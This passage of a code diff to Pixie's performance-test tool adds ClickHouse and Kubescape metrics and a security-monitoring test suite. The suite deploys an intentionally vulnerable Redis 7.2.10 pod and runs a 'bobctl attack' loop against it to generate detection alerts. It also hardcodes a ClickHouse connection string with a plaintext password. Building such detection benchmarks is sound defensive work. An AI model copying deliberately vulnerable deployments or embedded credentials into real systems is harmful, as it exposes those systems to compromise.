+// ClickHouse server metrics. Named so the --prom_recorder_override CLI flag +// can point it at a different cluster via kubeconfig/kube_context. +func ClickHouseOperatorMetrics(scrapePeriod time.Duration) *pb.MetricSpec { + return &pb.MetricSpec{ + MetricType: &pb.MetricSpec_Prom{ + Prom: &pb.PrometheusScrapeSpec{ + Name: ClickHouseOperatorPromRecorderName, + Namespace: "clickhouse", + MatchLabelKey: "app.kubernetes.io/name", + MatchLabelValue: "altinity-clickhouse-operator", + Port: 8888, + ScrapePeriod: types.DurationProto(scrapePeriod), + MetricNames: map[string]string{ + // Gauges: in-flight load on CH servers. + "chi_clickhouse_metric_Query": "clickhouse_active_queries", + "chi_clickhouse_metric_TCPConnection": "clickhouse_tcp_connections", + "chi_clickhouse_metric_HTTPConnection": "clickhouse_http_connections", + "chi_clickhouse_metric_MemoryTracking": "clickhouse_memory_tracking_bytes", + "chi_clickhouse_metric_BackgroundMergesAndMutationsPoolTask": "clickhouse_background_merge_tasks", + "chi_clickhouse_metric_PartsActive": "clickhouse_parts_active", + // Counters: throughput and errors. + "chi_clickhouse_event_Query": "clickhouse_queries_total", + "chi_clickhouse_event_InsertedRows": "clickhouse_inserted_rows_total", + "chi_clickhouse_event_SelectedRows": "clickhouse_selected_rows_total", + "chi_clickhouse_event_FailedQuery": "clickhouse_failed_queries_total", + "chi_clickhouse_event_NetworkSendBytes": "clickhouse_network_send_bytes_total", + "chi_clickhouse_event_NetworkReceiveBytes": "clickhouse_network_receive_bytes_total", + // Per-table gauges: storage-side pressure. + "chi_clickhouse_table_parts_rows": "clickhouse_table_parts_rows", + "chi_clickhouse_table_parts_bytes": "clickhouse_table_parts_bytes", + }, + }, + }, + } +} + +// KubescapeNodeAgentMetrics scrapes the Kubescape node-agent DaemonSet +// (the component that runs eBPF hooks and emits runtime anomaly alerts). +// Metrics are exposed on port 8080 of pods with label `app=node-agent` in +// the `honey` namespace, matching the kubescape helm chart defaults. +// +// Named so the --prom_recorder_override CLI flag can point it at a +// different cluster via kubeconfig/kube_context. +func KubescapeNodeAgentMetrics(scrapePeriod time.Duration) *pb.MetricSpec { + return &pb.MetricSpec{ + MetricType: &pb.MetricSpec_Prom{ + Prom: &pb.PrometheusScrapeSpec{ + Name: KubescapeNodeAgentPromRecorderName, + Namespace: "honey", + MatchLabelKey: "app", + MatchLabelValue: "node-agent", + Port: 8080, + ScrapePeriod: types.DurationProto(scrapePeriod), + // Whitelist is a superset: prometheus_recorder silently drops + // metrics that are not present in the source, so listing a + // candidate name that a particular kubescape version has not + // (yet) exposed is harmless. + MetricNames: map[string]string{ + // Standard Go/process exporters — always present. + "process_cpu_seconds_total": "kubescape_node_agent_cpu_seconds_total", + "process_resident_memory_bytes": "kubescape_node_agent_rss", + "process_virtual_memory_bytes": "kubescape_node_agent_vsize", + "go_goroutines": "kubescape_node_agent_goroutines", + // Kubescape-specific (names may vary across versions). + "kubescape_ruleengine_firing_alerts_total": "kubescape_firing_alerts_total", + "kubescape_ruleengine_applied_rules_total": "kubescape_applied_rules_total", + "kubescape_node_agent_events_seen_total": "kubescape_events_seen_total", + "kubescape_node_agent_events_dropped_total": "kubescape_events_dropped_total", + }, + }, + }, + } +} + +// ForensicAlertCountMetric runs a PxL script against the forensic +// ClickHouse cluster (via clickhouse_dsn=…) to count Kubescape anomaly +// alerts that Vector has landed in forensic_db.kubescape_logs. Emits one +// row per invocation with the total count over the windowed time range. +func ForensicAlertCountMetric(period time.Duration, dsn string, table string, window time.Duration) *pb.MetricSpec { + return &pb.MetricSpec{ + MetricType: &pb.MetricSpec_PxL{ + PxL: &pb.PxLScriptSpec{ + Script: forensicAlertsScript, + Streaming: false, + CollectionPeriod: types.DurationProto(period), + TemplateValues: map[string]string{ + "dsn": dsn, + "table": table, + "window": window.String(), + }, + TableOutputs: map[string]*pb.PxLScriptOutputList{ + "*": { + Outputs: []*pb.PxLScriptOutputSpec{ + singleMetricOutputWithPodNodeName("alert_count", "forensic_alert_count"), + }, + }, + }, + }, + }, + } +} + func singleMetricOutputWithPodNodeName(col string, newName ...string) *pb.PxLScriptOutputSpec { metricName := col if len(newName) > 0 { diff --git a/src/e2e_test/perf_tool/pkg/suites/scripts/clickhouse_export.pxl b/src/e2e_test/perf_tool/pkg/suites/scripts/clickhouse_export.pxl new file mode 100644 index 00000000000..895eb45a0b9 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/scripts/clickhouse_export.pxl @@ -0,0 +1,47 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# Exports a windowed slice of a Pixie events table to ClickHouse on every +# invocation, producing sustained load on the export path. px._pem_hostname() +# ensures the Map runs on the PEM so each row carries the correct hostname. +# +# source_table: the Pixie events table to read from (e.g. http_events, +# redis_events). dest_table: the ClickHouse destination table name. These +# must have compatible column shapes — exporting http_events rows to a +# pre-existing CH table created for redis_events will make the CH server +# reject the INSERT on the first column mismatch, and the clickhouse-cpp +# client will rethrow that as an uncaught std::exception, crashing Kelvin +# (see ClickHouseExportSinkNode TODO). + +import px + +df = px.DataFrame('{{.TemplateValues.source_table}}', start_time='-{{.TemplateValues.window}}') +df.hostname = px._pem_hostname() +px.export(df, px.otel.ClickHouseRows( + table='{{.TemplateValues.dest_table}}', + endpoint=px.otel.Endpoint( + url='{{.TemplateValues.dsn}}', + ), +)) + +# Emit one metric row per invocation so we can chart export cadence and row +# counts. The metric recorder will pick up row_count as a single metric. +metric_df = df.groupby([]).agg(row_count=('time_', px.count)) +metric_df.timestamp = px.now() +metric_df.node_name = px._exec_hostname() +metric_df.pod = 'clickhouse-export-driver' +metric_df = metric_df[['timestamp', 'node_name', 'pod', 'row_count']] +px.display(metric_df, 'export_stats') diff --git a/src/e2e_test/perf_tool/pkg/suites/scripts/clickhouse_read.pxl b/src/e2e_test/perf_tool/pkg/suites/scripts/clickhouse_read.pxl new file mode 100644 index 00000000000..8975e21e879 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/scripts/clickhouse_read.pxl @@ -0,0 +1,37 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# Reads a windowed slice of http_events back from ClickHouse on every +# invocation, exercising the ClickHouse read path and Pixie's ClickHouse +# source plan. Emits a metric row reporting the number of rows returned so +# we can track read throughput. + +import px + +df = px.DataFrame( + '{{.TemplateValues.table}}', + clickhouse_dsn='{{.TemplateValues.dsn}}', + start_time='-{{.TemplateValues.window}}', +) + +# A light-weight aggregation ensures ClickHouse actually has to scan the +# window rather than just serving the first page of rows. +metric_df = df.groupby([]).agg(row_count=('time_', px.count)) +metric_df.timestamp = px.now() +metric_df.node_name = px._exec_hostname() +metric_df.pod = 'clickhouse-read-driver' +metric_df = metric_df[['timestamp', 'node_name', 'pod', 'row_count']] +px.display(metric_df, 'read_stats') diff --git a/src/e2e_test/perf_tool/pkg/suites/scripts/forensic_alerts.pxl b/src/e2e_test/perf_tool/pkg/suites/scripts/forensic_alerts.pxl new file mode 100644 index 00000000000..ea67958f247 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/scripts/forensic_alerts.pxl @@ -0,0 +1,40 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +# Counts Kubescape anomaly alerts that Vector has written into +# forensic_db.alerts in the forensic ClickHouse cluster, windowed on +# event_time. One metric row per rule_id per invocation so the recorder can +# tag it as a per-rule series. + +import px + +df = px.DataFrame( + '{{.TemplateValues.table}}', + clickhouse_dsn='{{.TemplateValues.dsn}}', + start_time='-{{.TemplateValues.window}}', +) + +# forensic_db.kubescape_logs has (per the demo's observe.pxl probe) +# top-level columns: message, RuntimeK8sDetails, event_time. There is no +# top-level RuleID column — the rule id lives inside the JSON `message` +# payload. We just count total alerts in the window; per-rule breakdowns +# are left to downstream analysis. +df = df.agg(alert_count=('event_time', px.count)) +df.timestamp = px.now() +df.node_name = px._exec_hostname() +df.pod = 'forensic-alert-driver' +df = df[['timestamp', 'node_name', 'pod', 'alert_count']] +px.display(df, 'forensic_alert_stats') diff --git a/src/e2e_test/perf_tool/pkg/suites/scripts/healthcheck/redis_data_in_namespace.pxl b/src/e2e_test/perf_tool/pkg/suites/scripts/healthcheck/redis_data_in_namespace.pxl new file mode 100644 index 00000000000..cdd2c39e354 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/scripts/healthcheck/redis_data_in_namespace.pxl @@ -0,0 +1,25 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +import px + +df = px.DataFrame('redis_events', start_time='-30s') +df.namespace = df.ctx['namespace'] +df = df[df.namespace == '{{.Namespace}}'] + +df = df.agg(count=('time_', px.count)) +df.success = (df.count > 0) +px.display(df[['success']]) diff --git a/src/e2e_test/perf_tool/pkg/suites/sovereign_soc.go b/src/e2e_test/perf_tool/pkg/suites/sovereign_soc.go new file mode 100644 index 00000000000..552e3891ce8 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/sovereign_soc.go @@ -0,0 +1,483 @@ +/* + * Copyright 2018- The Pixie Authors. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + * SPDX-License-Identifier: Apache-2.0 + */ + +package suites + +import ( + // Embed import is required to use go:embed directive. + _ "embed" + "fmt" + "os" + "strings" + "text/template" + "time" + + "github.com/gogo/protobuf/types" + log "github.com/sirupsen/logrus" + + pb "px.dev/pixie/src/e2e_test/perf_tool/experimentpb" +) + +// existingVizierWorkload returns a VizierSpec that skips the deploy/skaffold +// rebuild but still binds the existing cluster's UUID to the Pixie context. +// Used when SOC_VIZIER_EXISTING=1 — e.g., the local-ci.sh phase 9 path where +// Pixie is already running in `pl` and connected to AOCC over Tailscale. +// +// The single PxCLIDeploy step has empty Args (so it does NOT redeploy) but +// SetClusterID=true, which makes pxDeployImpl.Deploy() call `px get cluster +// --id` and feed the result into pxCtx.SetClusterID. Without that, every +// subsequent NewVizierClient call errors with "must call SetClusterID +// before calling NewVizierClient on Context" — observed as a silent +// healthcheck loop until the 10-min backoff times out. +func existingVizierWorkload() *pb.WorkloadSpec { + return &pb.WorkloadSpec{ + Name: "vizier", + DeploySteps: []*pb.DeployStep{ + { + DeployType: &pb.DeployStep_Px{ + Px: &pb.PxCLIDeploy{ + SetClusterID: true, + }, + }, + }, + }, + Healthchecks: VizierHealthChecks(), + } +} + +// Paths are resolved relative to the pixie workspace root; run.go chdirs +// there at startup via BUILD_WORKSPACE_DIRECTORY / `git rev-parse +// --show-toplevel`, so the perf_tool binary always sees these files +// regardless of where the user invoked bazel run from. +const ( + sovereignSOCYAMLRoot = "src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc" +) + +//go:embed scripts/healthcheck/redis_data_in_namespace.pxl +var redisDataInNamespaceScript string + +// KubescapeVectorWorkload installs Kubescape (eBPF runtime-detection node +// agent + storage + operator) and Vector (DaemonSet shipping Kubescape node- +// agent logs into ClickHouse) on the experiment cluster. Manifests are +// pre-rendered from upstream Helm charts so PrerenderedDeploy can apply them +// statically — see k8s/sovereign-soc/helm-rendered/README.md for the +// re-render recipe. +// +// Treated as long-lived infrastructure (similar to the cert-manager +// prerequisite of the k8ssandra suite). All steps set +// SkipNamespaceDelete=true so teardown never tries to delete `honey` or +// `kube-system`. The first run installs; subsequent runs idempotently +// re-apply (Pixie's ApplyResources skips with IsAlreadyExists or falls +// through to Update). Manual cleanup is only required if you change the +// rendered YAML in a backwards-incompatible way. +// +// The workload is tagged with action_selector="infra" and the experiment +// schedules a START_WORKLOADS{Name:"infra"} action before +// START_METRIC_RECORDERS. That ordering is load-bearing: the kubescape +// node-agent's prometheus exporter is gated by a ConfigMap that this +// workload writes, and the perf_tool's prometheus recorder pre-flights +// port-forwards at recorder-start time. If recorders ran first, they +// would connect to an old node-agent pod with no listener on :8080 and +// the recorder would error out before the experiment even started +// measuring. +// +// Layout: +// 1. kubescape.rendered.yaml — honey namespace, main install + 5 CRDs at +// the top of the file (rendered with --include-crds so kubescape's +// `crds/` chart directory is emitted). +// 2. kubescape.rendered.kube-system.yaml — the one RoleBinding kubescape +// needs in kube-system (storage-auth-reader) for API aggregation auth. +// 3. kubescape-default-rules.yaml — the built-in runtime rule set. +// 4. vector.rendered.yaml — Vector DaemonSet + RBAC that tails Kubescape +// node-agent logs into forensic_db.kubescape_logs. Endpoint is the +// external forensic CH URL so any experiment cluster can write to it. +// SovereignSOCInfraSelector is the action_selector tagged onto the +// kubescape-vector workload so it runs in a dedicated START_WORKLOADS +// phase before START_METRIC_RECORDERS — see the docstring on +// KubescapeVectorWorkload. +const SovereignSOCInfraSelector = "infra" + +func KubescapeVectorWorkload() *pb.WorkloadSpec { + return &pb.WorkloadSpec{ + Name: "kubescape-vector", + ActionSelector: SovereignSOCInfraSelector, + DeploySteps: []*pb.DeployStep{ + { + DeployType: &pb.DeployStep_Prerendered{ + Prerendered: &pb.PrerenderedDeploy{ + YAMLPaths: []string{ + fmt.Sprintf("%s/helm-rendered/kubescape.rendered.yaml", sovereignSOCYAMLRoot), + }, + SkipNamespaceDelete: true, + }, + }, + }, + { + DeployType: &pb.DeployStep_Prerendered{ + Prerendered: &pb.PrerenderedDeploy{ + YAMLPaths: []string{ + fmt.Sprintf("%s/helm-rendered/kubescape.rendered.kube-system.yaml", sovereignSOCYAMLRoot), + }, + SkipNamespaceDelete: true, + }, + }, + }, + { + DeployType: &pb.DeployStep_Prerendered{ + Prerendered: &pb.PrerenderedDeploy{ + YAMLPaths: []string{ + fmt.Sprintf("%s/helm-rendered/kubescape-default-rules.yaml", sovereignSOCYAMLRoot), + }, + SkipNamespaceDelete: true, + }, + }, + }, + { + DeployType: &pb.DeployStep_Prerendered{ + Prerendered: &pb.PrerenderedDeploy{ + YAMLPaths: []string{ + fmt.Sprintf("%s/helm-rendered/vector.rendered.yaml", sovereignSOCYAMLRoot), + }, + SkipNamespaceDelete: true, + }, + }, + }, + }, + Healthchecks: []*pb.HealthCheck{ + { + CheckType: &pb.HealthCheck_K8S{ + K8S: &pb.K8SPodsReadyCheck{ + Namespace: "honey", + }, + }, + }, + }, + } +} + +// RedisVulnerableWorkload deploys the pre-populated Kubescape +// ApplicationProfile and the intentionally vulnerable Redis 7.2.10 pod +// that bobctl-attack targets. Both YAMLs land in the `redis` namespace. +// +// Tagged as `infra` so it deploys BEFORE START_METRIC_RECORDERS. The +// redis_events table only registers in Pixie after the PEM observes a +// RESP packet; with MultiTierAppWorkload running in the same selector, +// the api backend's redis cache traffic provides that first packet +// before any metric script probes the table. (Previously a separate +// redis-warmer Deployment served this role, but k6 → api → redis under +// MultiTierAppWorkload drives orders of magnitude more traffic and +// makes the warmer redundant.) +// +// Assumes the target cluster has Kubescape (honey/node-agent) preinstalled +// — the k8ssandra suite has the same "external prerequisite" shape. +func RedisVulnerableWorkload() *pb.WorkloadSpec { + return &pb.WorkloadSpec{ + Name: "redis-vulnerable", + ActionSelector: SovereignSOCInfraSelector, + DeploySteps: []*pb.DeployStep{ + { + DeployType: &pb.DeployStep_Prerendered{ + Prerendered: &pb.PrerenderedDeploy{ + // sbob ApplicationProfiles MUST precede the + // Deployments — kubescape only honours the + // `kubescape.io/user-defined-profile` label if + // the named profile already exists when the pod + // is admitted; otherwise it silently falls back + // to auto-learning and the t0-alerting we're + // trying to enable doesn't happen. See + // feedback_kubescape_empty_profile. + YAMLPaths: []string{ + fmt.Sprintf("%s/redis-sbob.yaml", sovereignSOCYAMLRoot), + fmt.Sprintf("%s/redis-client-sbob.yaml", sovereignSOCYAMLRoot), + fmt.Sprintf("%s/redis-vulnerable.yaml", sovereignSOCYAMLRoot), + }, + }, + }, + }, + }, + Healthchecks: redisHealthChecks("redis"), + } +} + +// MultiTierAppWorkload deploys a three-tier HTTP stack into the `redis` +// namespace whose request mix exercises four Pixie protocol decoders +// at the same time (http_events, redis_events, pgsql_events, dns_events): +// +// loadgen (k6) +// │ +// ▼ HTTP /api/item/{id}, /api/event ─→ http_events +// api-backend (Flask + gunicorn × 2 replicas) +// │ │ +// ▼ Redis GET/SETEX/DEL ▼ PostgreSQL SELECT/INSERT +// redis (existing) postgres (new) +// redis_events pgsql_events +// +// `qps` is k6's constant-arrival-rate target; `vus` the steady-state +// worker pool; `maxVUs` the burst cap. The base loadgen-k6.yaml ships +// configured for qps=500 / vus=50 / maxVUs=200 (the 1× profile); higher +// multipliers are wired in via a strategic-merge env patch on the +// loadgen Deployment, so the same three YAMLs serve all load levels. +// Kustomize merges env entries by `name`, replacing the relevant values +// in place without touching API_URL or anything else. +// +// Tagged `infra` so the redis + postgres + http traffic starts BEFORE +// the metric recorders' PxL healthcheck queries Pixie's protocol +// tables — without that ordering, the healthcheck loops on +// `Table 'redis_events' not found`. +func MultiTierAppWorkload(qps, vus, maxVUs int) *pb.WorkloadSpec { + envPatch := fmt.Sprintf(`apiVersion: apps/v1 +kind: Deployment +metadata: + name: loadgen + namespace: redis +spec: + template: + spec: + containers: + - name: k6 + env: + - {name: K6_QPS, value: "%d"} + - {name: K6_VUS, value: "%d"} + - {name: K6_MAX_VUS, value: "%d"} +`, qps, vus, maxVUs) + return &pb.WorkloadSpec{ + Name: "multi-tier-app", + ActionSelector: SovereignSOCInfraSelector, + DeploySteps: []*pb.DeployStep{ + { + DeployType: &pb.DeployStep_Prerendered{ + Prerendered: &pb.PrerenderedDeploy{ + // sbob ApplicationProfiles first — same reasoning + // as RedisVulnerableWorkload: the user-defined- + // profile label only takes effect if the named + // profile already exists at pod-admission time. + // loadgen is intentionally NOT profiled — it + // carries `kubescape.io/ignore: true` because it + // IS the adversary surface for k6 traffic. + YAMLPaths: []string{ + fmt.Sprintf("%s/postgres-sbob.yaml", sovereignSOCYAMLRoot), + fmt.Sprintf("%s/api-sbob.yaml", sovereignSOCYAMLRoot), + fmt.Sprintf("%s/postgres.yaml", sovereignSOCYAMLRoot), + fmt.Sprintf("%s/api-backend.yaml", sovereignSOCYAMLRoot), + fmt.Sprintf("%s/loadgen-k6.yaml", sovereignSOCYAMLRoot), + }, + Patches: []*pb.PatchSpec{ + { + Target: &pb.PatchTarget{ + Kind: "Deployment", + Name: "loadgen", + Namespace: "redis", + }, + YAML: envPatch, + }, + }, + }, + }, + }, + }, + Healthchecks: []*pb.HealthCheck{ + { + CheckType: &pb.HealthCheck_K8S{ + K8S: &pb.K8SPodsReadyCheck{ + Namespace: "redis", + }, + }, + }, + }, + } +} + +// BobctlAttackWorkload deploys a Kubernetes Job that runs `bobctl attack` +// against the vulnerable redis deployment in a tight loop for the +// experiment's duration. The Job's init container downloads the bobctl +// binary from the upstream release; the attack suite is mounted from the +// bob-suite-attack ConfigMap. +func BobctlAttackWorkload() *pb.WorkloadSpec { + return &pb.WorkloadSpec{ + Name: "bobctl-attack", + DeploySteps: []*pb.DeployStep{ + { + DeployType: &pb.DeployStep_Prerendered{ + Prerendered: &pb.PrerenderedDeploy{ + YAMLPaths: []string{ + fmt.Sprintf("%s/bob-suite-attack-cm.yaml", sovereignSOCYAMLRoot), + fmt.Sprintf("%s/bobctl-attack-job.yaml", sovereignSOCYAMLRoot), + }, + }, + }, + }, + }, + Healthchecks: []*pb.HealthCheck{ + { + CheckType: &pb.HealthCheck_K8S{ + K8S: &pb.K8SPodsReadyCheck{ + Namespace: "redis", + }, + }, + }, + }, + } +} + +// redisHealthChecks mirrors HTTPHealthChecks but asserts on Pixie's +// redis_events table instead of http_events. +func redisHealthChecks(namespace string) []*pb.HealthCheck { + checks := []*pb.HealthCheck{ + { + CheckType: &pb.HealthCheck_K8S{ + K8S: &pb.K8SPodsReadyCheck{ + Namespace: namespace, + }, + }, + }, + } + t, err := template.New("").Parse(redisDataInNamespaceScript) + if err != nil { + log.WithError(err).Fatal("failed to parse Redis healthcheck script") + } + buf := &strings.Builder{} + err = t.Execute(buf, &struct { + Namespace string + }{ + Namespace: namespace, + }) + if err != nil { + log.WithError(err).Fatal("failed to execute Redis healthcheck template") + } + checks = append(checks, &pb.HealthCheck{ + CheckType: &pb.HealthCheck_PxL{ + PxL: &pb.PxLHealthCheck{ + Script: buf.String(), + SuccessColumn: "success", + }, + }, + }) + return checks +} + +// SovereignSOCRedisAttackExperiment drives the vulnerable redis deployment +// with a continuous bobctl attack loop while Pixie is running. The +// clickhouse_export PxL script continuously exports a windowed slice of +// redis_events to the forensic ClickHouse cluster; KubescapeNodeAgent and +// ForensicAlertCount track the anomaly side, ProcessStats/Heap/CH operator +// track Pixie and CH health. +// +// exportDSN is the ClickHouse endpoint Kelvin uses for px.export; it MUST +// be reachable from the experiment cluster's network. Pointing this at an +// in-cluster service DNS name of a different cluster will crash Kelvin +// because ClickHouseExportSinkNode::OpenImpl does not catch exceptions +// thrown by the clickhouse-cpp client constructor on DNS failure. +// +// alertsDSN is the ClickHouse endpoint the perf tool reads forensic_db +// alerts from via clickhouse_dsn=. It can be a different cluster/db/user +// from exportDSN. A failure here will only error the forensic-alerts +// metric; it will not crash Kelvin. +func SovereignSOCRedisAttackExperiment( + metricPeriod time.Duration, + exportPeriod time.Duration, + exportWindow time.Duration, + exportDSN string, + exportTable string, + alertsDSN string, + alertsTable string, + alertCountWindow time.Duration, + predeployDur time.Duration, + dur time.Duration, + qpsMultiplier int, +) *pb.ExperimentSpec { + vizierSpec := VizierWorkload() + if os.Getenv("SOC_VIZIER_EXISTING") == "1" { + vizierSpec = existingVizierWorkload() + } + // Three-tier load profile. 1× = 500 k6 QPS / 50 preallocated VUs / + // 200 maxVUs (k6's own runtime cap). Each multiplier scales all + // three linearly — VUs > QPS would just sit idle, and maxVUs needs + // to stay above VUs to leave headroom for tail latency. + qps := 500 * qpsMultiplier + vus := 50 * qpsMultiplier + maxVUs := 200 * qpsMultiplier + e := &pb.ExperimentSpec{ + VizierSpec: vizierSpec, + WorkloadSpecs: []*pb.WorkloadSpec{ + // Kubescape + Vector first so the node-agent is running and + // Vector's log pipeline is live before any attack traffic is + // generated. Vector ships node-agent logs to + // forensic_db.kubescape_logs on the external forensic CH. + KubescapeVectorWorkload(), + RedisVulnerableWorkload(), + // Three-tier loadgen → api → (redis + postgres) lights up + // http/redis/pgsql/dns events simultaneously at the chosen + // QPS multiplier. + MultiTierAppWorkload(qps, vus, maxVUs), + BobctlAttackWorkload(), + }, + MetricSpecs: []*pb.MetricSpec{ + ProcessStatsMetrics(metricPeriod), + // Stagger the heap query slightly because of known query stability issues. + HeapMetrics(metricPeriod + (2 * time.Second)), + ClickHouseExportLoadMetric(exportPeriod, exportDSN, exportTable, exportTable, exportWindow), + ClickHouseOperatorMetrics(metricPeriod), + KubescapeNodeAgentMetrics(metricPeriod), + ForensicAlertCountMetric(metricPeriod, alertsDSN, alertsTable, alertCountWindow), + }, + RunSpec: &pb.RunSpec{ + Actions: []*pb.ActionSpec{ + { + Type: pb.START_VIZIER, + }, + { + // Deploy kubescape+vector first so the node-agent's + // prometheus listener on :8080 is up before the + // metric recorder pre-flights port-forwards. Without + // this ordering, the recorder errors out at startup. + Type: pb.START_WORKLOADS, + Name: SovereignSOCInfraSelector, + }, + { + Type: pb.START_METRIC_RECORDERS, + }, + { + Type: pb.BURNIN, + Duration: types.DurationProto(predeployDur), + }, + { + // Default selector (empty) catches the redis + + // bobctl-attack workloads. + Type: pb.START_WORKLOADS, + }, + { + Type: pb.RUN, + Duration: types.DurationProto(dur), + }, + { + Type: pb.STOP_METRIC_RECORDERS, + }, + }, + }, + ClusterSpec: DefaultCluster, + } + e = addTags(e, + "workload/sovereign-soc", + "workload/redis-attack", + fmt.Sprintf("parameter/export_window/%s", exportWindow), + fmt.Sprintf("parameter/alert_count_window/%s", alertCountWindow), + fmt.Sprintf("parameter/load_multiplier/%dx", qpsMultiplier), + fmt.Sprintf("parameter/k6_qps/%d", qps), + ) + return e +} diff --git a/src/e2e_test/perf_tool/pkg/suites/suites.go b/src/e2e_test/perf_tool/pkg/suites/suites.go index 4d5597ddf04..8116dff871e 100644 --- a/src/e2e_test/perf_tool/pkg/suites/suites.go +++ b/src/e2e_test/perf_tool/pkg/suites/suites.go @@ -20,6 +20,7 @@ package suites import ( "fmt" + "os" "time" pb "px.dev/pixie/src/e2e_test/perf_tool/experimentpb" @@ -30,15 +31,17 @@ type ExperimentSuite func() map[string]*pb.ExperimentSpec // ExperimentSuiteRegistry contains all the ExperimentSuite, keyed by name. var ExperimentSuiteRegistry = map[string]ExperimentSuite{ - "nightly": nightlyExperimentSuite, - "http-grid": httpGridSuite, - "k8ssandra": k8ssandraExperimentSuite, + "nightly": nightlyExperimentSuite, + "http-grid": httpGridSuite, + "k8ssandra": k8ssandraExperimentSuite, + "clickhouse-exec": clickhouseExecSuite, + "sovereign-soc": sovereignSOCSuite, } func nightlyExperimentSuite() map[string]*pb.ExperimentSpec { defaultMetricPeriod := 30 * time.Second preDur := 5 * time.Minute - dur := 40 * time.Minute + dur := 5 * time.Minute httpNumConns := 100 exps := map[string]*pb.ExperimentSpec{ "http-loadtest/100/100": HTTPLoadTestExperiment(httpNumConns, 100, defaultMetricPeriod, preDur, dur), @@ -73,6 +76,55 @@ func k8ssandraExperimentSuite() map[string]*pb.ExperimentSpec { return exps } +// clickhouseExecSuite covers the two sides of Pixie's ClickHouse integration +// under load: the write/export path and the read/query path. Both experiments +// share the same metric shape (process/heap/clickhouse-operator) so results +// can be compared directly. +// +// The ClickHouse operator metrics are scraped via the prometheus recorder +// named "clickhouse-operator" -- point the CLI at the correct cluster with: +// +// --prom_recorder_override clickhouse-operator=/path/to/kubeconfig:my-ctx +func clickhouseExecSuite() map[string]*pb.ExperimentSpec { + defaultMetricPeriod := 30 * time.Second + preDur := 5 * time.Minute + // preDur := 2 * time.Minute + dur := 20 * time.Minute + // dur := 5 * time.Minute + httpNumConns := 100 + httpTargetRPS := 3000 + + // Tight cadence on the export/read scripts to apply real pressure. + exportPeriod := 5 * time.Second + exportWindow := 30 * time.Second + readPeriod := 5 * time.Second + readWindow := 5 * time.Minute + + clickhouseDSN := "pixie:pixie_password@clickhouse.forensic.austrianopencloudcommunity.org:9000/default" + clickhouseTable := "http_events" + + exps := map[string]*pb.ExperimentSpec{ + "clickhouse-export": ClickHouseExportExperiment( + httpNumConns, httpTargetRPS, + defaultMetricPeriod, + exportPeriod, exportWindow, + clickhouseDSN, clickhouseTable, + preDur, dur, + ), + "clickhouse-read": ClickHouseReadExperiment( + httpNumConns, httpTargetRPS, + defaultMetricPeriod, + readPeriod, readWindow, + clickhouseDSN, clickhouseTable, + preDur, dur, + ), + } + for _, e := range exps { + addTags(e, "suite/clickhouse-exec") + } + return exps +} + func httpGridSuite() map[string]*pb.ExperimentSpec { defaultMetricPeriod := 30 * time.Second preDur := 5 * time.Minute @@ -115,3 +167,88 @@ func httpGridSuite() map[string]*pb.ExperimentSpec { } return exps } + +// sovereignSOCSuite drives the Sovereign SOC demo workflow (vulnerable +// Redis 7.2.10 + bobctl attack loop + Kubescape anomaly generation + +// forensic ClickHouse export) under perf_tool orchestration. Assumes the +// target cluster already has Kubescape (honey namespace, app=node-agent +// DaemonSet), an Altinity ClickHouse operator in the `clickhouse` namespace, +// and Vector tailing kubescape logs into forensic_db.alerts — same +// pre-installed-dependency shape as the k8ssandra suite. Point prometheus +// recorders at the forensic cluster via +// +// --prom_recorder_override clickhouse-operator=: +// --prom_recorder_override kubescape-node-agent=: +func sovereignSOCSuite() map[string]*pb.ExperimentSpec { + defaultMetricPeriod := 30 * time.Second + preDur := 2 * time.Minute + dur := 20 * time.Minute + + exportPeriod := 5 * time.Second + exportWindow := 30 * time.Second + alertCountWindow := 1 * time.Minute + + // Both DSNs target the same external forensic endpoint with the same + // pixie user (which has been granted SHOW/SELECT/INSERT on forensic_db.* + // out-of-band). The endpoint MUST be reachable from the experiment + // cluster's network — the clickhouse-cpp client will crash Kelvin with + // 